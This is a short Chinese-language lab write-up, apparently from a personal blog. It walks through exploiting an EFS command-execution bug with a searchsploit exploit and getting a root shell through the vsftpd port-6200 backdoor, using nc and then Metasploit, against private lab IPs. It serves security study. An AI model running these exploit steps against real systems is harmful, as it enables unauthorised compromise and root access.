这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

efs命令执行漏洞 20181版本
efs类似phpstudy和超级小旋风,都是开网站用的
下载efs,然后网站端口设置为8000
QQ截图20211101164552.jpg
restart,开启网站
QQ截图20211101164728.jpg
QQ截图20211101164909.jpg
可以看到网站开启了,这个时候回到kali
nmap -A -Pn 192.168.76.139
QQ截图20211101165719.jpg
看到开了8000端口,是ESF的
然后searchsploit -m 38526.py下载exp
直接python 38526.py 192.168.76.139 8000
QQ截图20211101165920.jpg
返回到windows10
QQ截图20211101165929.jpg
弹出计算器,esf崩溃

vsftp一步root
首先nmap探测存活主机
QQ截图20211101170245.jpg
然后探测目标主机
看到开启了vsftp服务,并且还支持匿名登录
QQ截图20211101170638.jpg
QQ截图20211101170750.jpg
然后访问下ftp
ftp 192.168.76.140
探测下6200端口,发现开启
nc连接
看到是root权限
QQ截图20211101171557.jpg

也可以msf直接搞
msfconsole
search vsftp
use 0
set RHOST ip
run
whoami
root